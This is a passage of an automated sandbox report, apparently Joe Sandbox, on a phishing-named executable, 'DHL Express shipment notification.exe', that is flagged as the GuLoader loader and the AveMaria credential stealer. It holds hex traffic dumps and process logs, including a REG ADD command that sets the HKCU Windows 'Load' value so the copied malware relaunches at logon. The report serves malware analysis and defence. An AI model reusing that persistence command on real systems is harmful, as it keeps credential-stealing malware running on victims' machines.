2021-12-01 18:26:22 UTC	306	IN	Data Raw: 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 59 14 e7 7c 88 5b 28 85 6a 6c 20 db 01 56 9a 68 2d 2b b9 a4 e2 4f 94 0f 69 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee 15 37 63 43 3e 93 50 69 1a da Data Ascii: Po]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Y\|[(jl Vh-+Oih/jBn37$Z=u7cC>Pi
2021-12-01 18:26:22 UTC	307	IN	Data Raw: f5 e1 a4 72 e2 65 79 ca 32 69 dd f7 a3 9d 6f 7e 6e 1d d4 64 70 e8 e3 58 f9 0c 4f b8 8c 4d b8 b0 5d d6 89 1b d2 90 55 d6 8e 0e c8 ac e3 44 8b 32 2c e3 74 06 47 7d 17 46 ca 7b a1 19 37 90 b6 22 d8 ff 2e 7a 12 b4 01 fc 10 c0 8f 0a 05 e6 db 75 bc 69 18 1b 54 78 da 16 97 0f df 2c 3b f5 8b 82 11 5f 04 29 80 97 a5 b2 b8 38 24 cd 04 8e d0 e5 81 96 38 f3 16 40 72 34 91 b6 46 04 36 76 73 a5 c4 91 03 73 77 71 62 6f e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 Data Ascii: rey2io~ndpXOM]UD2,tG}F{7".zuiTx,;_)8$8@r4F6vsswqbo0p_?S]y$+s(nMUwHnr*PFb6ZjFnB#P7WIiU?r&Dl4F
2021-12-01 18:26:22 UTC	309	IN	Data Raw: c9 e5 af 06 d2 c2 58 71 aa 38 00 51 39 7a 54 2b f6 13 82 03 62 2d c0 fe b2 87 ce e8 8f aa 69 22 6e 9e 28 cd 29 25 38 4a 79 b2 d1 45 cb 9e 28 ec 1a 75 42 3e 8f 27 26 bb 9d 84 54 99 e9 a7 63 aa d9 e1 b2 48 2c 15 38 5a 2e f0 79 c1 08 0d d1 df 04 d6 9b 69 5f d3 ef 60 e8 f1 af 5a a7 84 2d 25 e3 90 00 bb 14 e8 5f 7c 8b 82 00 85 6e 9a 08 db fe a6 b3 68 95 01 90 a4 e2 08 bd 0f 29 b6 a5 a3 a7 e7 80 aa e1 3b 06 6a b7 93 f6 98 bc 98 1a 37 24 c4 b1 b9 5a f9 b3 ab a0 60 da a4 75 d7 9f ee cd 90 49 43 30 40 c0 67 1a 9f a1 9a 85 8c 4b 4b a3 ef 07 29 cb be 0a 75 31 8b ac 33 d0 91 0a 22 20 63 0e 34 52 a0 23 d4 b6 7f 14 7a 3f 09 e1 80 30 e4 28 14 fd ce 31 ad d7 ea 38 2f b3 7a 1e 4f f4 8c 35 56 96 a4 08 af ee 93 81 cd e1 11 c4 29 1a 24 58 44 93 b4 3b 6b cc 26 8e 71 a2 25 ba Data Ascii: Xq8Q9zT+b-i"n()%8JyE(uB>'&TcH,8Z.yi_`Z-%_\|nh);j7$Z`uIC0@gKK)u13" c4R#z?0(18/zO5V)$XD;k&q%
2021-12-01 18:26:22 UTC	310	IN	Data Raw: 9e 44 24 46 5e bd 7a 7c 80 7a 0f 0a 25 fc 00 09 8f 49 99 74 04 12 9e 10 81 a5 f2 a0 ac 18 69 71 11 3d 50 f4 8c dc 59 43 38 17 d9 f2 6e 61 3a 39 1c 1f c7 cd d4 76 b9 74 02 79 cc af 7e 84 30 5b 26 d3 f8 15 18 d6 40 a5 60 2b d1 87 16 a9 86 f0 c9 5e 6a bf b4 19 24 3b 1a a0 82 66 f9 be 0b cc 36 58 bf 84 35 a5 b0 52 fd 76 ed 28 a5 a0 95 f0 68 0b d0 a5 5b 3e ec 25 76 61 62 b5 a1 2a 97 b7 f4 df f1 cf 3d 2d e9 4d 34 04 6c 5e 39 24 04 aa 39 05 af b3 98 6c e5 aa a8 67 7f 87 1e ba 5f a2 b8 ef 2a 95 2d 34 31 9f a7 ae 76 70 11 b9 9d 8e 27 50 26 85 fa 7c e7 48 1e 52 e7 31 68 11 32 ab 38 9c f4 76 df 35 3c 0b 7d 6a 7c ae 0c 9c 7a cb dd 69 94 f2 15 63 db 02 d6 d9 24 70 a6 c1 ab 06 45 d5 23 97 ee 2b 5e a9 09 9f b8 b7 ed 3b 4f 10 b4 e5 de 30 78 ad 13 5d d6 82 a3 27 df ad 40 Data Ascii: D$F^z\|z%Itiq=PYC8na:9vty~0[&@`+^j$;f6X5Rv(h[>%vab=-M4l^9$9lg_-41vp'P&\|HR1h28v5<}j\|zic$pE#+^;O0x]'@
2021-12-01 18:26:22 UTC	311	IN	Data Raw: 85 a6 14 89 c0 ea 39 ce 97 60 51 a6 9b 5a d4 66 1d 03 0e e2 35 4f c4 6e 1b 49 b5 93 c4 fe 46 f8 48 d0 e3 87 3b d1 7d 5b bd fe f0 d3 1a c0 c4 86 d6 2f 07 d4 2b 98 fd c8 2b 41 45 4b af c8 cd 28 aa f7 cc f7 3d 87 cd 1b c4 d8 8a e3 5a 00 2a 77 e9 9e 22 68 1c e4 e8 d6 ec 12 22 cd a7 7b 29 a6 93 48 32 54 8a de 5a b5 5d 45 72 52 cf 46 34 25 23 66 b9 db 0a 16 17 5c 56 8a e5 44 ee 6d 71 91 22 4d df b8 3a 14 42 d0 c9 7e 20 95 f3 5b 39 fb 95 44 c1 8a 42 c9 be 8e c8 9b 4a 7f fd 02 2d fd df 78 0f e2 66 c3 18 ee Data Ascii: 9`QZf5OnIFH;}[/++AEK(=Z*w"h"{)H2TZ]ErRF4%#f\VDmq"M:B~ [9DBJ-xf
2021-12-01 18:26:22 UTC	311	IN	Data Raw: 28 f5 3c 01 0a 10 1a 8c e9 f1 f8 fb 4d c5 93 1d 16 1e 46 59 54 b0 c6 23 0a ca e2 99 a4 7c e5 f4 ca 67 7d 7c 98 3a 7d 22 7e 34 4c f1 3c ad 8c 52 e4 8c 84 8e c2 3e b1 cb cc e1 2a 94 c2 b0 e1 f4 4c de aa 83 62 c8 a8 84 4a 96 ea 40 b8 fb 35 06 4d 98 e3 eb fc 14 0a 24 a3 8d 0c 0c b4 d9 21 d4 3a 0d 44 b3 7e 47 d0 9b 3d 8a 67 07 f0 56 99 38 6f c1 60 c5 99 c5 00 bd b6 48 ba b5 71 84 ba f0 00 9b 54 95 4d 6c cd 7d cb 7b 14 82 f6 65 e4 e3 a5 a7 8f b5 58 8e 36 77 e6 3a a1 8e 9d bd 56 db 0b 44 77 6b ae fd 12 f3 46 f1 b8 b6 39 44 b1 11 72 50 67 16 10 af 19 8d 79 43 f1 36 aa a4 91 63 17 66 1f ac ea 75 1e a7 82 a9 c4 4d fc 26 90 ac 91 22 92 29 2d 0b 73 9c 69 4f bc 67 27 09 25 d9 1e 03 a4 28 80 79 06 1a f3 33 ca bc d5 bb 96 0b 78 5a 35 37 58 e5 b0 cb 7e 41 56 1e dc f3 07 Data Ascii: (<MFYT#\|g}\|:}"~4L<R>*LbJ@5M$!:D~G=gV8o`HqTMl}{eX6w:VDwkF9DrPgyC6cfuM&")-siOg'%(y3xZ57X~AV
2021-12-01 18:26:22 UTC	313	IN	Data Raw: a5 49 93 0e 50 87 b3 14 25 49 9f 4e 8c 64 0c d0 29 7f eb a1 3a 6e 6b f9 34 f7 88 cc 49 53 8e c1 ae 7d 80 11 60 3a 19 a3 37 d0 1c a5 5d 17 8b ab cb 79 1e aa 52 0e 99 aa 6f a7 8a 8d dd 66 12 80 b3 b5 17 30 fc 75 10 86 51 fc 8d 5d 7a 23 98 ed de 6e 68 4a 56 ac b4 aa 65 7d 3a c0 28 57 59 ef cf 45 ac b6 f8 36 4b 7f 4d 65 df 7d 48 cf 19 2c 1a 5f 59 3b 08 6b 7c 54 9e 24 22 76 2d ad 81 a0 73 a6 b7 68 14 c4 51 2d 38 5d 89 5b 5e 82 80 b0 66 12 a5 f2 9b fa f0 ee 8c ea 98 28 55 07 81 04 a0 4d 97 14 23 1d 18 df 30 bf 2b 1b 89 6a 11 72 5b c7 6c 05 df f8 a1 16 f4 80 b9 48 e5 ac 35 a2 2d 5f be 0e 5a 59 64 55 ac 65 45 bc b2 6d e5 b1 26 2a b5 95 05 9b a5 f3 5a ca b9 61 4c ac 9c 5c e8 71 3a 21 13 e7 2e 45 e0 6e 1b 49 b5 93 c4 fe 46 f8 42 dd cd ad 3a e0 5c 4c a6 da cc cb 1d Data Ascii: IP%INd):nk4IS}`:7]yRof0uQ]z#nhJVe}:(WYE6KMe}H,_Y;k\|T$"v-shQ-8][^f(UM#0+jr[lH5-_ZYdUeEm&*ZaL\q:!.EnIFB:\L
2021-12-01 18:26:22 UTC	314	IN	Data Raw: 05 30 21 93 89 61 16 bc d9 28 ee 5e 4e 4a b7 6a 47 ca bc 1b 8c 67 0b f0 45 8c 59 6b c3 0e c5 99 f5 4f a3 be 63 85 bf 7c 8b e9 f3 1b 9c 57 9f 68 42 cd 73 f6 49 02 87 d0 5a ff f2 a7 c9 85 8f 0c 98 2c 72 c8 25 a0 c1 84 bb 3f ff 07 44 7e 55 be a1 16 f0 75 c7 cb b0 19 5f 87 15 72 71 15 12 0b 9e 0a ba 73 64 f9 51 b3 ac 93 0e 0d 6b 5f ac e4 78 63 af 9b b9 d7 57 e1 10 8b 8f 9e 37 9f 29 2d 05 4e ae 7f 50 bc 67 27 09 25 89 1b 05 a9 45 9a 74 46 1a f3 03 85 a2 dd 8b ac 0b 60 67 5c 3f 59 e8 8f f8 75 54 37 1d d6 f2 6e 61 3a 39 1c 1f c7 cd fe 7e a4 5f 31 74 cc ab 62 aa 3a 3f 3e d2 f4 32 38 cb 47 ac 6b 4f 9e 80 1a a9 af ef c4 06 62 a0 dd 01 0c 26 14 a8 88 2c b6 a3 03 cb 1d 69 ba 9d 23 b2 b0 6a e6 7c e9 2b a0 e2 ca 9d 76 0d fd a4 59 29 a7 6a 69 68 62 b4 83 34 c0 d6 d0 d6 Data Ascii: 0!a(^NJjGgEYkOc\|WhBsIZ,r%?D~Uu_rqsdQk_xcW7)-NPg'%EtF`g\?YuT7na:9~_1tb:?>28GkOb&,i#j\|+vY)jihb4
2021-12-01 18:26:22 UTC	315	IN	Data Raw: b7 9a af 3b 63 12 a4 36 71 42 f6 ef 44 f1 b2 f8 27 4b 36 4e 4b de 60 43 df 1b 20 0b 4a 44 7a 7f 75 73 4f 96 09 62 5c 21 bd ac 8a 70 91 99 68 02 fd 51 37 38 57 8d 79 4f d8 a7 a3 75 07 8d ee b9 d7 e1 cb 8d f9 a9 49 52 1d b8 69 ba 48 cf 1c 03 17 36 f5 31 8e 09 1b 83 68 24 65 46 fb 48 64 cc f4 bd 7b f4 8d f3 56 cb af 24 b9 26 6b be 0e 1f 5c 7f 54 b3 5c 44 ea ab 45 81 af 08 29 a4 8e 0e af a5 f3 1f d5 a2 6a 57 b7 8c 50 cf 43 4e 00 15 e5 36 45 e1 40 1b 41 ad 9b e0 f4 2f f0 5f fc d6 90 20 e6 5b 4c aa f8 f4 a7 1f c8 dc 84 de 41 2d d2 36 96 dc bc 19 5a 59 49 b0 ff 97 2d a2 ef ce e9 53 b7 c1 01 e0 f1 ee ba 56 15 26 79 e2 ad 02 6e 20 fe f7 c1 fd 16 38 a3 b7 45 47 a6 9d 45 5b 46 9f f1 56 99 5f 66 47 54 ee 50 59 16 2f 7e a7 b6 19 59 0c 5a 76 a3 c7 55 c3 54 7b 8e 2f 69 Data Ascii: ;c6qBD'K6NK`C JDzusOb\!phQ78WyOuIRiH61h$eFHd{V$&k\T\DE)jWPCN6E@A/_ [LA-6ZYI-SV&yn 8EGE[FV_fGTPY/~YZvUT{/i
2021-12-01 18:26:22 UTC	317	IN	Data Raw: dd af 0a 44 96 17 6e 14 62 1e 10 af 24 bc 6c 64 f5 42 8d a1 9e 77 18 63 52 aa db 7d 39 a7 f6 9a df 4a e7 2e 86 c6 87 37 85 4c 0f 1d 6e 9c 69 4f b5 62 23 1c 23 e8 0f 07 95 49 83 75 68 00 ff 21 81 9e c3 a6 96 0b 78 55 33 3e 41 ec 85 b9 66 4b 38 1e d8 f3 40 61 32 21 14 3d d6 97 c0 76 b9 66 1f 7c cf a7 69 c9 28 5e 25 da d2 28 0d ed 4a b9 77 4e ee 96 01 a2 8a e7 c1 4c 6a bf b4 19 24 3b 1a a0 82 66 c1 af 18 c7 3d 5f a2 a7 3e a7 c2 78 ff 73 f6 23 8c a9 c6 94 7a 10 be bf 57 2c a7 25 71 71 5c a9 a9 32 c0 b7 d3 da fe db 03 26 b2 54 31 72 7e 78 22 3d 3e bc 7e 21 a6 d2 e1 78 c9 8b 8a 03 6f d7 72 3c 26 f1 d7 b4 30 94 14 40 62 9b a7 c3 1b 14 3f e9 d1 ef 5e 33 49 f0 94 36 cf 2c 2f 4a e7 6c 0e 7e 47 c5 5c fb d4 01 b6 fb 51 66 19 6a 5e a6 0c 91 48 a4 a8 d7 d0 a5 15 ac 9c Data Ascii: Dnb$ldBwcR}9J.7LniOb##Iuh!xU3>AfK8@a2!=vf\|i(^%(JwNLj$;f=_>xs#zW,%qq\2&T1r~x"=>~!xor<&0@b?^3I6,/Jl~G\Qfj^H
2021-12-01 18:26:22 UTC	318	IN	Data Raw: 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 22 f7 67 d0 7d 95 e5 29 28 50 36 2c 48 1c 9c ed b8 a4 a3 cc 7e 0e 5c 25 d1 60 f2 e3 45 ce 40 a7 2f 6a b7 c1 33 80 37 2e 3f 64 72 8a 10 c1 56 2a 3e ab a0 3d 7b e3 45 9a 43 65 92 1b e8 7c b9 c9 12 ec 58 52 02 e7 71 13 24 5b db 49 69 d9 4e 30 2e f1 b4 fe 87 33 11 da 31 11 e9 25 fe 40 7f c1 75 2c b9 d0 2c 75 fe f1 c0 00 0c b8 65 9d a8 be 61 a4 5c 9b 97 ef 53 a3 c2 a4 f7 94 6d ae d7 c3 ee dd 31 9b f9 31 6a c0 1d a2 5f 0d fe 08 83 aa 26 b0 47 4f b0 51 a1 85 1d 15 ae e0 b4 03 d1 0c 9d 99 61 3d 60 65 af 71 f2 0b cc bc 08 1c 03 8c 24 ab 37 06 1c 8b 24 6f 25 85 49 75 9d 65 be 91 4f dd 1b 28 06 62 Data Ascii: {ip>d!AH,zZ.;!i_`Z%(N"g})(P6,H~\%`E@/j37.?drV*>={ECe\|XRq$[IiN0.31%@u,,uea\Sm11j_&GOQa=`eq$7$o%IueO(b
2021-12-01 18:26:22 UTC	319	IN	Data Raw: 16 53 57 71 72 a3 e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 1b 14 3f e9 f1 ef 5e 03 49 f0 94 18 a6 48 4e 3e 86 48 3b 7e 47 c5 5c cb f4 01 b6 5b 51 66 19 44 2c c2 6d e5 29 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 4e 5e de 60 f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 Data Ascii: SWqr0p_?S]y$+s(nMUwHnrPFb6ZjFnB#P7WIiU?r&Dl4F?^IHN>H;~G\[QfD,m)0lVK PN^`uBv/T%c5}K$e@0}[,SdvvPo]`
2021-12-01 18:26:22 UTC	320	IN	Data Raw: 9c 80 d4 b8 1a 5e 82 03 ea de 89 25 06 6f 11 80 ae de 6f ba ac 2d 95 b7 c5 2a 40 3b 80 78 f8 ad 56 dd 05 2e df c1 2f c4 be 5e b0 6e 55 42 95 e1 1a 13 fd a3 17 15 07 98 b1 46 e6 ac 17 9d 16 64 13 d4 64 ac 3e 26 80 6f 0f 71 08 29 fa af 07 8d 33 2b ca 08 2a f7 e0 37 23 56 84 22 05 a4 c3 9f 20 68 ae a3 1d c3 d6 88 94 0d d9 6f d1 0a 23 c0 4c 11 aa ed 2c e1 f5 a1 99 de 9b 8d ad 88 7b b3 44 99 d4 71 ac 56 a7 39 90 f5 55 6c 41 62 0e 09 e3 dc 7c 2a 94 fb cc a9 2b ef a0 d9 1c 00 31 78 6e b1 75 a8 20 9d a8 90 c4 01 06 97 f4 b2 d8 45 64 db 93 04 dd d8 cb 88 de d2 a7 41 a0 45 d3 9d 94 51 dd 80 ab 38 14 7b ab e0 5f de c8 5d bf 5d 4c 93 7d c1 dc 2d 5f b8 89 cd bd 82 5e 98 e4 e8 1c 56 c1 6f c1 12 51 8f 0e fe 07 28 97 46 97 a9 9e 55 ef 53 1e 5a ef a0 df 2f bb a0 cd e4 cd Data Ascii: ^%oo-@;xV./^nUBFdd>&oq)3+7#V" ho#L,{DqV9UlAb\|*+1xnu EdAEQ8{_]]L}-_^VoQ(FUSZ/
2021-12-01 18:26:22 UTC	322	IN	Data Raw: aa e9 55 2d a7 b6 6b a2 20 dc 6c b9 52 30 2c 71 ff e3 dd f2 b6 2c fa 03 42 9b 4f 4a 1b 5e ea a1 7b f1 8c 34 46 de c8 c3 1b 04 0f c8 c1 94 6e c9 79 de a5 76 97 d0 7f 9a b7 e4 0a c8 76 79 6d 2e c5 ea 87 aa 60 91 28 46 1e ca 5f f6 1b bd 9a 23 c2 8f 27 05 8c 57 80 db 64 55 e2 f3 eb 16 12 ce 62 98 bb 36 6c a0 52 7b e7 55 bb 80 2e dc e8 35 a8 82 23 1e 44 e3 a9 3f e2 8a 8c 28 17 0e 51 cf b5 d0 4e 78 17 be 19 ce 3a e0 87 8e 03 84 e1 62 3f 4e 9b 35 af 6b 95 8d 67 50 9c 76 20 0a 50 df 42 ac f9 a9 a9 6f f7 51 55 f3 f0 94 21 35 b1 6b 52 a7 f6 46 e7 8e f4 c7 3d e3 f8 6c e7 a5 68 2b 24 bf fc f4 bd 16 0d d4 65 1a bf 52 5b 15 15 37 f7 cd f8 51 26 73 92 6b 2e 03 ad be 16 8b f3 e2 67 bf 49 9a 3a 74 22 e3 8c 84 55 90 0c 30 0c 6c 35 38 0e b9 77 5f 2c e2 fe db d7 e0 ea e8 21 Data Ascii: U-k lR0,q,BOJ^{4Fnyvvym.`(F_#'WdUb6lR{U.5#D?(QNx:b?N5kgPv PBoQU!5kRF=lh+$eR[7Q&sk.gI:t"U0l58w_,!
2021-12-01 18:26:22 UTC	323	IN	Data Raw: 90 b0 64 82 12 16 9d 9e 72 47 aa d6 6b 7b c5 37 91 ce 2e ff f3 bb 83 89 17 73 c3 1b 7a ea 8c 6b 55 56 35 3f 4f 06 79 3d 66 ec 5b c8 49 23 b9 40 94 67 00 ad d9 61 4a 6e 79 66 08 b8 aa d3 5b 0e 9e 48 f6 c0 bb 6a 91 dc 42 0b b1 55 10 8b 1a 1a 21 83 65 af d9 64 b0 bf db 7e 9f f5 ef 6b bd 2e 77 6c 9a 24 b5 9c 1a ba f7 e1 3c b3 f5 c3 2e a5 ae 13 e5 d6 6b 2b 50 a1 b3 df 9c f0 57 cc d3 70 52 c0 e6 10 76 32 09 d7 14 61 1e fc 8d 1b 5d 17 26 93 ad 38 ec 29 2c bf 3a 82 c0 29 1a 72 e1 f0 dd 37 2b 50 dc 4c 47 16 0f f7 3a 75 96 3b 94 dd 47 ed a5 21 a7 8d fb fd df 87 6f 94 68 98 bc c7 f2 0d c7 14 08 23 56 ed 2b eb e2 54 43 7a 19 58 80 fd 63 6e db 24 3f 73 2c 76 5c e7 51 f3 22 75 aa 63 e7 b9 c5 a6 46 c1 0d 0d b5 c9 71 19 ca 1d 8a 02 b7 6c df dd cd 10 ce 7d 7d 06 27 4a 31 Data Ascii: drGk{7.szkUV5?Oy=f[I#@gaJnyf[HjBU!ed~k.wl$<.k+PWpRv2a]&8),:)r7+PLG:u;G!oh#V+TCzXcn$?s,v\Q"ucFql}}'J1
2021-12-01 18:26:22 UTC	324	IN	Data Raw: 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 4e 5e de 60 f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 Data Ascii: lVK PN^`uBv/T%c5}K$*e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL Express shipment notification.exe PID: 8720 Parent PID: 8844

General

Start time:	19:25:08
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DHL Express shipment notification.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Express shipment notification.exe"
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: DHL Express shipment notification.exe PID: 6632 Parent PID: 8720

General

Start time:	19:25:22
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DHL Express shipment notification.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Express shipment notification.exe"
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: explorer.exe PID: 4856 Parent PID: 6632

General

Start time:	19:25:40
Start date:	01/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff73b350000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 8712 Parent PID: 6632

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Imagebase:	0xd30000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: images.exe PID: 3256 Parent PID: 6632

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 25%, Virustotal, Browse Detection: 11%, ReversingLabs
Reputation:	low

Analysis Process: conhost.exe PID: 3240 Parent PID: 8712

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff64fb60000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: reg.exe PID: 8620 Parent PID: 8712

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Imagebase:	0x1a0000
File size:	59392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: images.exe PID: 8428 Parent PID: 3256

General

Start time:	19:26:05
Start date:	01/12/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: cmd.exe PID: 3288 Parent PID: 8428

General

Start time:	19:26:24
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
